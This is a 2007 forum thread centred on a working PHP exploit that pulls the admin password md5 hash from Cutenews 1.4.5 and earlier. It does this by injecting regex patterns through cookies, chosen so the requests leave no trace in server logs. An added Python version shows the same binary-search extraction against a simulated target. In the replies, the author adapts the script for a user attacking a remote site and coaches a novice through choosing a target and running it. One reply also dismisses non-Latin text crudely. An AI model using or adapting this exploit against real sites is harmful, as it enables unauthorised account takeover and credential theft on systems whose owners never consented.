www.waraxe.us Forum Index -> All other software -> Cutenews <= 1.4.5 admin password md5 hash fetch exploit
Cutenews <= 1.4.5 admin password md5 hash fetch exploit
Posted: Sun Dec 23, 2007 10:49 pm
waraxe (Site admin; joined May 11, 2004; posts: 2407; location: Estonia, Tartu)

Code:

<?php
error_reporting(E_ALL);
///////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////
// Cutenews <= 1.4.5 admin password md5 hash fetching exploit
// Version 1.1
// written by Janek Vind "waraxe"
// http://www.waraxe.us
// 25. dec 2007
// Estonia, Tartu
//
// FEATURES:
// 1. Fetching algorithm optimized for speed
// 2. Attack goes through $_COOKIE, so no log fear
// 3. Pretesting saves time if Cutenews is not vulnerable
//
// Version 1.1 -> pattern recognize improved
//
// More useful tools: http://www.waraxe.us/tools/
// Waraxe forums: http://www.waraxe.us/forums.html
//
// NB! This exploit is meant to be run as php CLI!
// http://www.php.net/features.commandline
///////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////
//=====================================================================
$target = 'http://localhost/cutenews.1.4.5/search.php';
$username = 'waraxe'; // Username is needed
$outfile = './cute_log.txt';// Log file
//=====================================================================
///////////////////////////////////////////////////////////////////////
// Don't mess below this line, unless you know the stuff ;)
///////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////
$levels = array(1=>'admin',2=>'editor',3=>'journalist',4=>'commenter');
$start_time = time();
$requests = 0;
$cli = php_sapi_name() === 'cli';
//=====================================================================
// Warning, if executed from webserver
//=====================================================================
if(!$cli)
{
   if(!isset($_REQUEST['wtf-is-cli']))
   {
      echo "<html><head><title>Attention!</title></head>\n";
      echo "<body><br /><br /><center>\n";
      echo "<h1>Warning!</h1>\n";
      echo "This exploit is meant to be used as php CLI script!<br />\n";
      echo "More information:<br />\n";
      echo "<a href=\"http://www.google.com/search?hl=en&q=php+cli+windows\" target=\"_blank\">http://www.google.com/search?hl=en&q=php+cli+windows</a><br />\n";
      echo "Still, you can try to run it from webserver.<br />\n";
      echo "Just press the button below and prepare for long waiting<br />\n";
      echo "And learn to use php CLI next time, please ...<br />\n";
      echo "<form method=\"get\">\n";
      echo "<input type=\"submit\" name=\"wtf-is-cli\" value=\"Let me in, i don't care\">\n";
      echo "</form>\n";
      echo "</center></body></html>\n";
      exit;
   }
   else
   {
      // Let's try to maximize our chances without CLI
      set_time_limit(0);
   }
}
//=====================================================================
add_logline("-------------------------------------------------------");
add_logline("Cutenews password md5 hash fetching started");
add_logline("Target: $target");
add_logline("Username: $username");

pre_test();

$h = get_hash();
$run_time = time() - $start_time;

add_logline("MD5 hash: $h");

xecho("\nFinal MD5 hash: $h", 1);
xecho("\nTotal time spent: $run_time seconds", 1);
xecho("HTTP requests made: $requests\n", 1);
xecho("Questions and feedback - http://www.waraxe.us/forums.html", 1);
xecho("See ya! :)", 1);

exit;
//////////////////////////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////
function get_hash()
{
   $hash = '';
   
   for($i = 0; $i < 32; $i ++)
   {
      xecho("Finding hash char pos $i");
      $c = get_hash_char($i);
      $hash .= $c;
      xecho("Current hash: $hash");
   }
   
   return $hash;
}
///////////////////////////////////////////////////////////////////////
function get_hash_char($pos)
{
   global $username;
   
   $un = "^$username\$";
   $charset = '0123456789abcdef';
   
   // Anchor the probe so that exactly one hash character is under test:
   // $pos hex chars before it, 31 - $pos hex chars after it.
   $beg = '^';
   if($pos > 0)
   {
      $beg .= "([a-f0-9]{{$pos}})";
   }
   
   $end = '$';
   if($pos < 31)
   {
      $cnt = 31 - $pos;
      $end = "([a-f0-9]{{$cnt}})\$";
   }
   
   // Narrow the 16 hex candidates by halves: 4 yes/no queries per character,
   // 128 requests for the whole 32-character hash.
   for($i = 8; $i > 0; $i >>= 1)
   {
      $first = substr($charset, 0, $i);
      $second = substr($charset, $i);      
      $hp = "$beg([$first])$end";

      // A hit count of 1 means the character at $pos is inside [$first]
      if( make_query($un, $hp) === 1)
      {
         xecho("Position $pos: [$first]");
         $charset = $first;
      }
      else
      {
         xecho("Position $pos: [$second]");
         $charset = $second;
      }
   }
   
   return $charset;
}
///////////////////////////////////////////////////////////////////////
function pre_test()
{
   global $username;
   
   // Target URL valid?
   xecho("Validating target URL");
   if(strpos(make_get($GLOBALS['target']), 'search_in_archives') === false)
   {
      die('Target URL not valid!');
   }
   xecho("URL is valid");
   
   $un = "^$username\$";
   if( make_query($un) !== 1)
   {
      die('Pretest 1 failed - wrong username?');
   }
   else
   {
      xecho("Pretest 1 passed - username OK", 1);
   }

   $hp = '^[a-f0-9]{32}$';
   if( make_query($un, $hp) !== 1)
   {
      die('Pretest 2 failed - target not vulnerable?');
   }
   else
   {
      xecho("Pretest 2 passed - regex injection OK", 1);
   }

   $hp = '^[a-f0-9]{1337}$';
   if( make_query($un, $hp) !== 0)
   {
      die('Pretest 3 failed - target not vulnerable?');
   }
   else
   {
      xecho("Pretest 3 passed - regex injection OK", 1);
   }
}
///////////////////////////////////////////////////////////////////////
function make_query($username, $hashpattern = '')
{
   global $target;
   $max_retries = 10;
   
   // Injection point: search.php also reads its parameters from $_COOKIE,
   // so the patterns never appear in the web server's access log.
   // files_arch[] points the search at data/users.db.php instead of a news
   // archive; the "title" pattern is then matched against the username and
   // the "story" pattern against the md5 password hash of that record.
   $cookie = "dosearch=yes;files_arch[]=./data/users.db.php;title=$username";
   if(!empty($hashpattern))
   {
      $cookie .= ";story=$hashpattern";
   }
   
   for($retry = 0; $retry < $max_retries + 1; $retry ++)
   {
      if($retry > 0)
      {
         xecho("Request failed!", 1);
         xecho("Sleeping $retry seconds", 1);
         sleep($retry);
         xecho("Awake ...", 1);
         xecho("Retry #$retry", 1);
      }
      $buff = make_get($target, $cookie);
      // v1.1: only the "[N]:" hit counter is matched, so a translated
      // "Founded News articles" template still parses
      $ret = preg_match('/\[[0-9]{1,6}\]:/',$buff,$hits);
      if($ret > 0)
      {
         $ret = intval(substr($hits[0], 1));
         if($ret > -1)
         {
            return $ret;
         }
      }
   }
   
   die('Fatal error - server down?');
}
///////////////////////////////////////////////////////////////////////
function make_get($url, $cookie = '', $referer = '', $headers = FALSE)
{
   $ch = curl_init();
   $timeout = 120;
   curl_setopt($ch, CURLOPT_URL, $url);
   curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
   curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
   curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);
   curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)');
   
   if(!empty($cookie))
   {
      curl_setopt($ch, CURLOPT_COOKIE, $cookie);
   }
 
   if(!empty($referer))
   {
      curl_setopt($ch, CURLOPT_REFERER, $referer);
   }

   if($headers === TRUE)
   {
      curl_setopt($ch, CURLOPT_HEADER, TRUE);
   }
   else
   {
      curl_setopt($ch, CURLOPT_HEADER, FALSE);
   }

   $fc = curl_exec($ch);
   curl_close($ch);
   $GLOBALS['requests'] ++;
   
   return $fc;
}
//////////////////////////////////////////////////////////////////////
function add_logline($line)
{
   global $outfile;
   
   $line .= "\n";
   $fh = fopen($outfile, 'ab');
   fwrite($fh, $line);
   fclose($fh);
   
}
//////////////////////////////////////////////////////////////////////
function xecho($line, $both = 0)
{
   if($GLOBALS['cli'])
   {
      echo "$line\n";
   }
   elseif($both)
   {
      $line = nl2br(htmlspecialchars($line));
      echo "$line<br />\n";
   }
}
/////////////////////////////////////////////////////////////////////
?>


Feedback is welcome.

Last edited by waraxe on Mon Dec 24, 2007 11:07 pm; edited 3 times in total
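The extraction logic of the script above, reimplemented as an added example in Python (this is not waraxe's script and not CuteNews code) so it can be run offline and the request budget checked. `SimulatedTarget` stands in for the vulnerable search.php: it applies the `title` and `story` cookie values as regexes to a constructed user table and renders the hit count in a "Founded News articles [N]:" template. `fetch_hash` runs the same three pretests and the same 4-queries-per-hex-digit binary search; the count is parsed with the script's own `[N]:` pattern, so the template can be in any language. The sample users, hashes, templates and the `re.escape` on the username are assumptions made here.

```python
"""Added example: blind regex-injection binary search, run against a simulated
search.php. Not part of the original script or of CuteNews."""
import hashlib
import re

HEX = "0123456789abcdef"

# Constructed sample data standing in for data/users.db.php; the hashes are
# md5() of throwaway strings computed here, not real credentials.
SAMPLE_USERS = {
    "waraxe": hashlib.md5(b"throwaway-pass-1").hexdigest(),
    "editor": hashlib.md5(b"throwaway-pass-2").hexdigest(),
}

# Two constructed renderings of the hit counter, English and a localized one;
# the count parser must not depend on the wording around the number.
TEMPLATES = {
    "en": "<b>Founded News articles [{n}]:</b>",
    "dv": "ފެނުނު އާޓިކަލް؛ [{n}]:",
}

# Same pattern the v1.1 script uses: a bracketed number followed by a colon.
COUNT_RE = re.compile(r"\[([0-9]{1,6})\]:")


def parse_count(body):
    """Pull the result count out of a search response regardless of language."""
    m = COUNT_RE.search(body)
    if m is None:
        raise RuntimeError("count pattern not found in response")
    return int(m.group(1))


class SimulatedTarget:
    """Stand-in for the vulnerable search.php: the 'title' and 'story' cookie
    values are used directly as regexes against each user record."""

    def __init__(self, lang="en"):
        self.template = TEMPLATES[lang]
        self.requests = 0

    def query(self, title_re, story_re=""):
        self.requests += 1
        n = 0
        for username, pw_hash in SAMPLE_USERS.items():
            if re.search(title_re, username) and (not story_re or re.search(story_re, pw_hash)):
                n += 1
        return parse_count(self.template.format(n=n))


def pretest(target, user_re):
    """The three checks the script runs before spending 128 requests."""
    return (target.query(user_re) == 1                           # exactly one user matches
            and target.query(user_re, "^[a-f0-9]{32}$") == 1     # its hash is 32 hex chars
            and target.query(user_re, "^[a-f0-9]{1337}$") == 0)  # the regex really is evaluated


def fetch_hash_char(target, user_re, pos):
    """Binary-search one hex digit: 4 yes/no queries narrow 16 candidates to 1."""
    prefix = f"^([a-f0-9]{{{pos}}})" if pos > 0 else "^"
    suffix = f"([a-f0-9]{{{31 - pos}}})$" if pos < 31 else "$"
    charset = HEX
    step = 8
    while step > 0:
        first, second = charset[:step], charset[step:]
        # Ask: is the digit at `pos` one of `first`? A count of 1 means yes.
        charset = first if target.query(user_re, f"{prefix}([{first}]){suffix}") == 1 else second
        step >>= 1
    return charset


def fetch_hash(target, username):
    """Recover the full 32-character md5 hash; returns None if the pretest fails."""
    # re.escape is an addition; the original script passes the username verbatim.
    user_re = f"^{re.escape(username)}$"
    if not pretest(target, user_re):
        return None
    return "".join(fetch_hash_char(target, user_re, pos) for pos in range(32))


if __name__ == "__main__":
    t = SimulatedTarget("dv")
    print(fetch_hash(t, "waraxe"), "in", t.requests, "requests")
```

Against the localized template the full hash comes back in 3 + 32 * 4 = 131 simulated requests, which is the budget the script's "Fetching algorithm optimized for speed" note refers to; a per-character linear scan over the 16 hex digits would need up to four times as many.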
Posted: Mon Dec 24, 2007 10:56 am
pexli (Valuable expert; joined May 24, 2007; posts: 665; location: Bulgaria)

Wow waraxe, you are a great dude. Very nice work, and a stupid bug. :) God bless you. ;) Merry Christmas.
Posted: Mon Dec 24, 2007 12:18 pm
waraxe (Site admin)

Merry Christmas :)
Can't work out
Posted: Mon Dec 24, 2007 4:55 pm
theface (Active user; joined Dec 24, 2007; posts: 33)

I am running the script on a Windows machine, and when I try to connect to the local machine it works, but when I try to connect to a remote server it gives me a server timeout.

"Fatal errror - server down?"

Any suggestions?
Re: Can't work out
Posted: Mon Dec 24, 2007 6:00 pm
waraxe (Site admin)

theface wrote:
I am running the script on a Windows machine, and when I try to connect to the local machine it works, but when I try to connect to a remote server it gives me a server timeout.

"Fatal errror - server down?"

Any suggestions?

This is the code fragment:

Code:

      $buff = make_get($target, $cookie);
      $x = strpos($buff, '<b>Founded News articles [');
      $y = strpos($buff, ']:</b>', $x + 25);
      if( ($x !== false) && ($y !== false) && ($x < $y) )
      {
         $buff = trim(substr($buff, $x + 26, $y - $x - 26));
         $ret = intval($buff);
         if( ($ret > -1) && ($ret < 2) )
         {
            return $ret;
         }
      }
   }
   
   die('Fatal errror - server down?');

So this error message can be a little bit misleading, sorry ...
It means that the server response does not contain the "Founded News articles " pattern as expected. I tested my exploit script against many targets and it always worked. In your case this problem can be related to modified Cutenews scripts, so that the output looks different, or there are other malfunctions. I suggest you write some debugging code right after the make_get() call. Example:

Code:

$buff = make_get($target, $cookie);
//===========
die("Debug: $buff");
//===========
      $x = strpos($buff, '<b>Founded News articles [');
      $y = strpos($buff, ']:</b>', $x + 25);

In this way you can see the details of the server response in plain text, and if there are any error messages, like "cannot open file" or something like that, then feel free to post the details here. Maybe I am able to help.
Posted: Mon Dec 24, 2007 6:18 pm
theface (Active user)

Actually I think the problem is
Code:

$buff = make_get($target, $cookie);
//===========
die("Debug: $buff");
//===========
      $x = strpos($buff, '<b>Founded News articles [');
      $y = strpos($buff, ']:</b>', $x + 25);

Instead of "Founded News articles" they have changed it to come in a different font, I mean, so it's not coming with that; it gives that text in another language.

So can that be a problem?

Code:

Debug: HTTP/1.0 200 OK Date: Mon, 24 Dec 2007 18:14:18 GMT Server: Apache Content-Type: text/html X-Cache: MISS from proxy104.rol.net.mv X-Cache-Lookup: MISS from proxy104.rol.net.mv:8080 Via: 1.0 proxy104.rol.net.mv:8080 (squid/2.6.STABLE5) Connection: close

ޚަބަރު;  <------ THIS IS NEWS

ޞުރުހީ  <--------- THIS IS TITLE

ލިޔުންތެރިޔާ   <------ THIS IS WRITER
ދުވަހުން  12345678910111213141516171819202122232425262728293031 JanFebMarAprMayJunJulAugSepOctNovDec 20032004200520062007200820092010
ދުވަހަށް  12345678910111213141516171819202122232425262728293031JanFebMarAprMayJunJulAugSepOctNovDec20032004200520062007200820092010 
ކުރީގެ ޚަބަރުވެސް ހޯދާ  <------ THIS IS LOOK IN ARCHIVES

  އެޑްވާންސް    <----- THIS IS ADVANCE

ފެނުނު އާޓިކަލް؛ [35]:

This is what I am getting now. Any suggestions?

ފެނުނު އާޓިކަލް؛ [35 <----- this is "Founded News articles [0]:"
Posted: Mon Dec 24, 2007 10:08 pm
pexli (Valuable expert)

Looks like Arabic shit.
Posted: Mon Dec 24, 2007 10:50 pm
theface (Active user)

koko wrote:
Looks like Arabic shit.

No, it's Maldivian, called Dhivehi.
Posted: Mon Dec 24, 2007 11:01 pm
waraxe (Site admin)

I got it to work. I made the pattern recognition code more flexible.
Just look at the exploit posted above - I have made changes and now it's version 1.1 :)

And of course - feedback is welcome - let me know if it works.
Posted: Sun Jan 13, 2008 5:18 pm
onez (Regular user; joined Jan 12, 2008; posts: 5)

Can I get a detailed explanation on how I can set this up and get it going? Thank you.
Posted: Sun Jan 13, 2008 9:01 pm
waraxe (Site admin)

onez wrote:
Can I get a detailed explanation on how I can set this up and get it going? Thank you.

First download PHP for Windows:

http://www.php.net/downloads.php

Maybe this version is the best choice:

http://ee2.php.net/get/php-5.2.5-win32-installer.msi/from/a/mirror

Install it - now you have PHP on your home PC.
Next copy-paste the PHP code from my exploit and put it into a text file "cutemd5.php". That's the exploit script in the PHP language.
And finally - search for a target. You must have the URL of the target website's "search.php" script. Something like this:

Code:
http://localhost/cutenews.1.4.5/search.php

After you have done all these preparations, come back here and let me know. And then I will explain how to run the exploit.

One more thing to do - change the username in the script to the target's username.

Last edited by waraxe on Mon Jan 14, 2008 5:59 pm; edited 2 times in total
Posted: Sun Jan 13, 2008 11:03 pm
onez (Regular user)

I downloaded PHP.

I copied and pasted the code and it's in a .php file.

I found a target.
Posted: Mon Jan 14, 2008 12:26 am
waraxe (Site admin)

Now edit your exploit script.
Search for this:

Code:

$target = 'http://localhost/cutenews.1.4.5/search.php';

and change it to your target, example:

Code:

$target = 'http://www.mytarget.com/search.php';

Next create a new text file "go.cmd" and write "cmd" in it.
After saving that file its icon should look in Windows like an old "bat" file. It means that this file is a Windows shell script file.
Now double-click on "go.cmd" to execute it.
You should see a black window - the command prompt.
Type "php" and look at what happens. If the PATH variable is set correctly, then you should see no error messages. If PATH is not set as needed, then an error message will show up.

Please try these steps and let me know about the results.
Posted: Mon Jan 14, 2008 12:53 pm
pexli (Valuable expert)

My way.

Create a new .txt file and put this inside:

Code:
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\shell\cmd]
@="Open DOS here"

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\shell\cmd\command]
@="cmd.exe /k\"set path=%path%;z:\\tools&&cd  %L\""

Rename this .txt to somename.reg. Right click on the file >> Merge.

Next, go to the PHP folder. Right click on the PHP folder, "Open DOS here". This opens a command prompt. Next open the folder where you saved your exploit. Type in the prompt,

example:

php.exe K:\myfolder\myexploit.php

...and press Enter.
Posted: Mon Jan 14, 2008 1:55 pm
onez (Regular user)

waraxe wrote:
Now edit your exploit script.
Search for this:

Code:

$target = 'http://localhost/cutenews.1.4.5/search.php';

and change it to your target, example:

Code:

$target = 'http://www.mytarget.com/search.php';

Next create a new text file "go.cmd" and write "cmd" in it.
After saving that file its icon should look in Windows like an old "bat" file. It means that this file is a Windows shell script file.
Now double-click on "go.cmd" to execute it.
You should see a black window - the command prompt.
Type "php" and look at what happens. If the PATH variable is set correctly, then you should see no error messages. If PATH is not set as needed, then an error message will show up.

Please try these steps and let me know about the results.

OK, I did all that and got no error.

What are the next steps?
All times are GMT
Page 1 of 4